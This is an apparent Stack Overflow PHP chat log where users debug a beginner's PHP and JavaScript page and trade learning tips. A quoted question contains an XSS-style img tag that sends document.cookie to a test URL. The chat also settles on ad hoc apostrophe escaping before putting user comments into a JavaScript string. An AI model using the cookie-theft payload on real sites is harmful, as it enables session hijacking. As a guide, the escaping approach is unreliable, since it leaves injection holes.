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@Sam it still isn't working
@Sam nothing hapens
is it online?
@Sam can u please help me withmy prob
@Paul @RepWhoringPeeHaa what's wrong with mysql? And what advantages does mysqli have?
you are using audio tag, Goofy; not all browsers support it yet
all our DBs at work are mysql...
@electrickoolaid42 mysql_* will be deprecated in the future. mysql_* lacks features the new mysqli_* function have
but we're in the process of setting up new DB servers and moving the DB over and if there's a flaw in mysql now would be a great time to find out
@electrickoolaid42 Its not the DB, but the PHP extension we are talking about.
ah, right on
I got scared for a second there
@electrickoolaid42 the problem that is having is that the html spans more than one line, and JS doesn't allow strings to go beyond more than one line without concatenating it
it just needs to be concatenated properly
our entire cloud-based point of sale system is basically a giant set of mysql DB connections
and a pretty gui
@Sam did u see my query?
@Goofy yeah.....what about it?
check this please
i am able to play the audio file in chrome
but its not playing in mozilla or ie
@RepWhoringPeeHaa cool, ty
@Sam the html doesn't haaaave to span more than one line, does it?
@RepWhoringPeeHaa thanks buddy i will use the same but i need to resolve this first
@Goofy not all browsers support the audio tags yet
Most do
@Sam so any solution?
it's an html5 thing? All kinds of craziness with html5
@electrickoolaid42 if it's a long string, yes, it will
well, the only thing I really know of is the video tag situation, where google can afford to buy the license to display html5 videos and firefox can't
in h.264? or I dunno, whichever encoding isn't open source
@electrickoolaid42 almost solved......:P
@Sam yeah, thank you so much for your help
don't show Chris your site; he'll definitely kill you....:D
@Sam so i need to use this??
@Goofy try it; it's supposed to be a cross-browser solution
again, programmer, not web designer
I make things do cool stuff, I don't make them look pretty
@electrickoolaid42 not an excuse.....:P
@Sam ok ok
@electrickoolaid42 Warning: file_get_contents() [function.file-get-contents]: Filename cannot be empty in /home/sykonaut/public_html/lotd_get.php on line 62 on url: sykonaut.net/index.php?e=something
a lot
@RepWhoringPeeHaa erm, I could swear I fixed that
Q: Give php link as src in image tag

Jimit I have question in my mind, If I write something like <img src="javascript:document.location ='http://localhost/test.php?ex='.concat (escape(document.cookie));" alt="home"/> in image tag will it be execute the test.php file at time of image loading?

@RepWhoringPeeHaa it couldn't find the url to the comments RSS feed, I was having problems with that the other day and had to modify index.php
@electrickoolaid42 put this after the loop; it should work
html = preg_replace("\n", "", $html);
Whoa, 271 Questions : 6 answers
that should remove the return character, and put everything on a single line
@RepWhoringPeeHaa but it shouldn't be doing that anymore, unless you entered a number for e in the url that's greater than the amount of posts I have
@Sam alright, trying it now
@RepWhoringPeeHaa Not me :)
@Donut I know. ofc not
html5 makes flash seem so outdated...but it still has to get support on a lot of browsers..some have partial support but none have full support yet :(
@electrickoolaid42 uhhmm shouldn't the user hit a 404 then?
@RepWhoringPeeHaa no because index.php has static content.. you will just get nothing or an error for the content coming from lotd_get.php
@ShyamK flash isn't for video purposes only............you still need it for some content stuff
@electrickoolaid42 Well the asked resource cannot be found right?
@RepWhoringPeeHaa correct, if you end up with a url that has e < 5 right now (there's 6 posts), there's no content to display
@electrickoolaid42 mistake; try this
html = preg_replace("/\n/", "", $html);
@Sam Thats why it still exists
@RepWhoringPeeHaa but if you are using the buttons on the website and not manually screwing with the url that shouldn't be a problem
@ShyamK yup, and it'll be around for a while
@Sam shouldn't the html to the left of the = have a $ in front of it?
@electrickoolaid42 That's just a stupid mindset
second mistake....:D
@RepWhoringPeeHaa well enlighten me then; this is day 3 of my first attempt at writing a web application kind of thing
@Sam well I hope its not killed by html5.. I dont understand whats all the hype all about.. html5..eh its alright..loads of stuff don't work yet..still this much hype..
considering that I should be enjoying my bed at the moment, any non-explosive mistake I make can be forgiven...:D
well .. did you try learning , @electrickoolaid42
@electrickoolaid42 As I said. You should be able to handle invalid requests and return a 404 page not found response
@tereško learning.... what?
@ShyamK well, eventually, every technology dies........so, the question isn't if; it's when
@electrickoolaid42 javascript , php , the internet
@electrickoolaid42 php variable all have to have the $ in front for them to work as variables :D
lol the internet
@electrickoolaid42 don't use global
@Sam true dat.. but some stuff is just better to keep around..like maybe a new version of flash?
@RepWhoringPeeHaa okay, what can I use instead to get the necessary variables from one php to another, one function to another
@Sam ,actually that is completely incorrect
there's more than one so return won't work unless PHP can return multiple variables
@tereško did someone pee in your cereal this morning, or are you always kind of a dick?
@electrickoolaid42 return an array instead?
@tereško what is?
@ShyamK I thought of that as soon as I typed that comment, there's no reason that wouldn't work
@electrickoolaid42 lol
but like I said earlier, this thing is in the very early stages. I'm a Java programmer, this PHP stuff-- this whole creating content instead of just consuming it on the Internet-- is very new to me. I'm still heavily in the learning stages when it comes to this stuff
that's why I'm here
@electrickoolaid42 dude, give me permission to kill you right now...:P
@Sam lol why's that
@electrickoolaid42 multiple returns wont work as the function quits when it hits a return.. right?.. so it wont proceed further down that road..just returns back to where the function was called.. right? hehe :D
on line 106, change var html=\"$html\";\n"; to var html='$html';\n";
is that why you want to kill me?
uploading new version now
@electrickoolaid42 those double quotes are messing with the double quotes inside the content of $html; that was why it kept throwing that error
@electrickoolaid42 doesn't java have a return statement? or atleast some thing similar? dont blame ur lack of experience in php for ur dumbness
thats most prob why he wants to kill ya
lack of experience in doing crap with websites. also dude, I'm an undergraduate college student with about 1.5 years experience in programming. I'm technically a professional programmer, and with a couple other undergrads I've created something pretty cool at work, but I wouldn't say I write professional code
@Sam , it actually has been stated that technologies are practically immortal , civilization has lost very few of them over the ages ( mostly because the nation which had said technology was destroyed )
it works, it doesn't throw runtime errors, but...
and I DEFINITELY wouldn't try and represent myself as some master programmer
@tereško ok; I stand corrected; the correct term would have been 'evolved'
@electrickoolaid42 1.5 years??? I dont even have 6 months
I'm a master programmer.
So, bite me.
@electrickoolaid42 look at the source code of the page, and remove the ` \ ` after ` var html `
@electrickoolaid42 , start by reading "PHP Masters", then "Eloquent JavaScript" .. then read all you can find about "3 layers of web"
@Chris I dont eat junk food :D
not 1.5 years consecutive dude, I've just been in college for that long. I've only been working as a programmer for 4 months
@electrickoolaid42 , and i am assuming tht you already know html/css
@tereško thanks for the suggestions, I'm adding them to my list; and yes, I know enough html to spring forth a basic website
@electrickoolaid42 still its not right to blame a technology when you cant understand it... A bad work man always blames his tools :P
did I blame a technology?
I didn't intentionally do that
@electrickoolaid42 you kinda did....but never mind...
@electrickoolaid42 fixed the code?
@tereško and I know how to google well enough to get pretty much anything done with html that I have needed to do so far
@Sam not yet. I'll do that now
You google html? Oh god, you are indeed an amateur.
sorry, css. no, I don't really need to google html
@electrickoolaid42 , actually an update , start by reading about "3 layers of web" .. that will be the most helpful ATM ( and will take like 30 min )
You google CSS?
I have before; I have jack shit for web design experience
html and css are the two things you need to have in the back of your skull.
at least I don't just use dreamweaver and call it a day
@Chris tru dat
heh .. thats a start
@Chris , i am quite sure that you would not be able to solve a CSS exercise i have
@tereško Try me.
fight fight fight
Damn, It's getting hot.
yeah what happened to the supportive friendly atmosphere, why does everyone feel the need to wave their virtual dick around
everyone is/was a noob at something at some point
@electrickoolaid42 are you using FF?
but the fact that we're here suggests a willingness to learn and/or teach
@Sam yes
@electrickoolaid42 pull up your JS error console
@Sam I have firebug, that good?
@electrickoolaid42 and refresh the page; it'll point to the error you are missing
@Chris , this would be the first part. A container ( light gray ) which at first grows up as you add content , and then at some pre-set limit, starts growing down
the squares are there to simulate content
@tereško That's pure CSS?
all browsers , IE7+ and no tables
@Donut yes , thats pure css
@Sam hm. yeah, it doesn't like the apostrophes
#column:first-child #inner{bottom:50%;background:#333;}
#column:first-child #inner .box{top:0;}
or rather the backslashes
oh, ie7 .. screw that.
@electrickoolaid42 it's not the apostrophe; it's that backslash; remove it
@Sam yeah, got it already
@Sam uploading now
There are now comments on the page
lol....the page still looks like zombieland...:P
@Sam thank you so, so much.
white and blue = zombies?
@Chris , the other exercise would be to create "unholy grail layout" : a full height 3-column layout , with elastic sides and fixed-width center .. basically a reverse of alistapart.com/articles/holygrail
in any case, once I complete the backend part of it, I'll work on the look
or, tbh, I could just buy food for the web design team at the office and get one of them to do it
@electrickoolaid42 another thing you have to take note is the apostrophe; that code will break once a comment has apostrophe in it; so, using str_replace or preg_replace to backspace every apostrophe
are there any particular advantages to one or the other?
I don't think so, but cool ppl, who know regex, use preg_replace more than str_replace
regex is something that's been on my list of stuff to learn soon for awhile now with java
People who know regex only use it when they have to.
after seeing it in some code from a merchant services provider we almost used
but we didn't go with them so I never really picked it up
also; @Sam is there no way to just escape the apostrophe?
I'm guessing not if the page was whining about the backslashes just a min ago...
since you don't know if it'll exist or not, you need a dynamic way to escape it; hence, calling the str_replace/preg_replace function after that loop should deal with it
I get that part
but you said backspace
as in delete
hence asking if it can be escaped instead so people don't wonder why their apostrophes keep disappearing
no.....I meant escape
my bad
ah, no worries
all problems solved?
very close
trying to work preg_replace
$html = preg_replace("/'/", "\'", $html);
yeah I wouldn't have figured that out very quickly
actually I was close
so maybe
uploading now
you'll get it; as long as you are willing/ready to learn, you'll get it all
does it work?
I'm sure I will; learning is my favorite hobby
yup, works great
thanks dude
I'd +1 you or upvote you or whatever you call that here on SO like 50 times if this wasn't in the chat
no problem; now, go bribe the design dept to clean up the design mess.....:P
that's the plan
and you should probably get some sleep if you still have time
off to bed; see you around
oh yeah....must
yup, thanks again
posted on May 08, 2012 by Stefan Koopmanschap

This morning, I had a nice e-mail in my mailbox telling me I got accepted into the NorthEast PHP conference with no less than 3(!) topics! Awesome, and I would love to be part of the conference, however... the conference is organized by the community, and the way they work, there is no travel reimbursement.

@Chris , so .. did you try to solve them ?
i made both exercises as pre-interview tasks , to filter out some applicants
Did not. But what is that time window you give them?
Oh, I figured 2 hours or so
well .. the timeframe was whole weekend , but ASAP
it's no point in loosing a good candidate just because he/she is shot on time just that moment
Tho' all interviews I've experienced are, "what can you do?", "if so, do it now, here, ASAP"
hello @all
i need to get started wit php but the books&tutorials come boring because the all show already known things..
i have a good background of C/C++ and Objective C and also a little of Java
where sould i start studying php? PHP/Javascript-Ajax ect..
and alsı MySQL
i need a combination of these
make some useful app, fsck (pointless) tutorials...
@webarto to me?
@ilis yup
@webarto like what? i'm really confused about how to go ahead
@ilis , then i would recommend to quickly skip through this page : devzone.zend.com/6/php-101-php-for-the-absolute-beginner
it should give you some pointers on syntax
and then read "PHP in Action" and/or "PHP Object-Oriented Solutions"
I am agree with @tereško
for JS id would go with lectures from here : yuiblog.com/crockford suplimented by reading eloquentjavascript.net/contents.html
I am agree? Is that some new meme?
@ircmaxell Heh, the floating point discussion...
@ilis , and for MySQL , you can go read any book on the subject ( if you do not know the basics ) ... if you are advanced user , read "SQL antipatterns"
@tereško i saved both links, i will go with them. thanks a lot
good morning
posted on May 08, 2012 by Derick Rethans

10 years of Xdebug and Xdebug 2.2.0 released London, UK Tuesday, May 8th 2012, 14:00 BST Today it has been ten years since the first release of Xdebug: version 0.7.0. I would like to celebrate this tenth anniversary with a new release: Xdebug 2.2.0. Xdebug 2.2 adds support for PHP 5.4 and provides some new features: Colour

@tereško i will note that too, i'm on a middle experience.
@CarrieKendall good afternoon:)
@ilis , in that case just go straight for antipattern book
Good morning
looks like people from colonies are waking up
@tereško Eh, there's a phase where it isn't really awake but more a pre-coffee zombification
the night is well and truly here. Evening all.
notes that Paul is from place where people walk upside down
@ircmaxell funky
PHP DateTime object question, how do I format it to show total hours, even when the Date difference is several days (72hours etc)?
@ircmaxell , well .. same happens in php too : python.codepad.org/dwhRzDqa
big number is big
@Event_Horizon Is this date/time returned from DateTime::diff()?
Yeah I've read that page, it has a total days format but not total hours
@Event_Horizon Touche. Not sure, I'd have to do some more research.
You could get the total days and multiply by 24 ;)
Yeah I was thinking that I was just wondering if there was some undocumented way of doing it within the class
@Event_Horizon Admittedly I have not done a lot with date/time. I would probably just do the multiplication as the very cursory skimming of the docs didn't show me anything that might be useful.
Alright thanks @CharlesSprayberry
oh, thats what you said Charles
Just use the hours though in the format?
oh, it doesn't give an option to multiply for you, that sucks.
I love it when a meal comes together
together with what
I prefer it with bacon
@MikeBoutin Hello
@MikeBoutin Yo
How are you ?
Fine, You?
me too ^^
Just writing up some docs, doing some light coding. You?
Writing a class to get some JIRA infos to put it on a tv screen for my compagny's departement workflow
very cool project ^^
and i was wondering which is the best way to scan this type of array/objects to get the right ID
[0] => stdClass Object
[id] => 6
[name] => DIV - Demande documents électroniques
[description] =>
[icon] => https://hathor.onjira.com/images/icons/newfeature.gif
[subTask] =>

[1] => stdClass Object
[id] => 7
[name] => DIV - Demande générale
[description] =>
[icon] => https://hathor.onjira.com/images/icons/newfeature.gif
[subTask] =>

[2] => stdClass Object
[id] => 9
[name] => DIV - Formulaires dynamiques
[description] =>
[icon] => https://hathor.onjira.com/images/icons/newfeature.gif
I search for the ID but i want to have a better way than a foreach :/
can i ?
@tereško yes, but python is supposed to use arbitrary precision math
This array can change overtime
@ircmaxell , well , that i did not know
do someone know ?
or i have to take a foreach ?
@MikeBoutin You could array_walk and use a callback that returns true/false for the appropriate ID
Or a foreach would work as well
@CharlesSprayberry which is faster and less consuming in ressources
@MikeBoutin I have no idea. I never speculate about performance; write up your code and profile/benchmark it if you wanna know which will be faster
ill try array_walk ^^
love to try new ways
Hi, is something wrong in this code? It doesn't seem to work:
(wrote it myself)
<?php if (is_home() || is_archive() || is_search()) : ?>

// code here

<?php else : ?>
<?php endif; ?>
@geekpanth3r Define "doesn't seem to work". What are all those functions?
@geekpanth3r You mean you didn't wrote it yourself? That is obviously WP
Hey guys
@Chris yeah, I wrote it myself, and yes, it's for my wordpress site
@geekpanth3r What exactly doesn't work here?
What have you tried to debug?
@CharlesSprayberry The code is not being output on home page (and it's inner pagination), search and archives
It's only being output on the home page
@geekpanth3r Perhaps that is perfectly valid if one of the three functions is returning false?
@CharlesSprayberry Oops! I set it to show after 8 posts, and there aren't that many posts under 1 category yet. :P
sorry for the trouble.
@Truth It's actually working, my mistake. :P
@Truth hey
@RepWhoringPeeHaa Your framework gist made me laugh...and cry
@CharlesSprayberry :-) @tereško was so kind to provide even more shit. I think I will first figure out what frameworks I want to handle. And after that come up (with all your help :) ) with a nice list
Afternoon everyone!
@RepWhoringPeeHaa how are you doing mate?:)
I almost got the frameworking working by the way:P
few problems left to solve
I was just wondering.. what's your structure like? Cause the rewrite you gave me redirects to the index.php in your root folder(htdocs for me). Currently I've this setup:

Frame folder
-- MicroFTW
-- Tests
-- www.example.com
A: PDO insert query, why isn't this working

TruthI wouldn't do it your way. After a few minutes, I came up with this: /** * @param PDO $pdo * @param string $table * @param array $columns_values * * @throws Exception */ function insert_to_db(PDO $pdo, $table, array $columns_values) { //Some data validation. if (empty($columns_...

Sometimes I get into creative mood.
Hey guys I'm trying to setup a redirect to include at the top of each page based on sessions, this if(!(isset($_SESSION['userid']))||!$_SESSION['userid']) should return true if userid isn't set right?

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